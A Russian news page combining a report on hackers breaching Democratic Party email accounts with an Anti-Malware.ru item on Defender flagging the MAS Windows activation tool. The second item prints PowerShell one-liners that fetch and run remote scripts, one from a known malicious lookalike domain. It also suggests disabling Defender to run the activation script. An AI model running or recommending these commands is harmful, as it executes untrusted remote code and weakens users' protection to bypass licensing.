Хакеры взломали почту более 100 сотрудников Демпартии США

Хакеры взломали почту более 100 сотрудников Демпартии США

Хакеры взломали почту более 100 сотрудников Демпартии США

Хакеры взломали более ста почтовых аккаунтов в ходе атаки на сервера Демократической партии США, сообщает газета New York Times со ссылкой на чиновников, знакомых с ситуацией. Собеседники издания подчеркнули, что последствия взлома оказались более серьезными, чем предполагалось ранее.

Так, ранее сообщалось, что хакеры получили доступ к серверам Комитета по выборам в Конгресс и Национального демократического комитета (главного партийного органа), в том числе к аналитической программе, которую использовал избирательный штаб Хиллари Клинтон.

Сейчас демократы, знакомые с расследованием, говорят, что от хакерской атаки могла пострадать и Ассоциация губернаторов от Демократической партии (Democratic Governors" Association). В связи с новыми данными ФБР расширило расследование, передает ria.ru.

Утечка электронной переписки партийного руководства, которая была опубликована на ресурсе WikiLeaks, привела к отставке председателя нацкомитета Демократической партии Дебби Вассерман-Шульц. Из документов следует, что партийный аппарат во время праймериз открыто поддерживал Хиллари Клинтон в ущерб проигравшему Берни Сандерсу.

Позднее целый ряд демократов, в том числе и президент США Барак Обама, не исключили связи хакеров с российскими властями. По их мнению, атака может быть выгодна кандидату в президенты США от Республиканской партии Дональду Трампу.

Пресс-секретарь российского президента Дмитрий Песков заявил, что обвинения в адрес Москвы абсурдны.

 

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru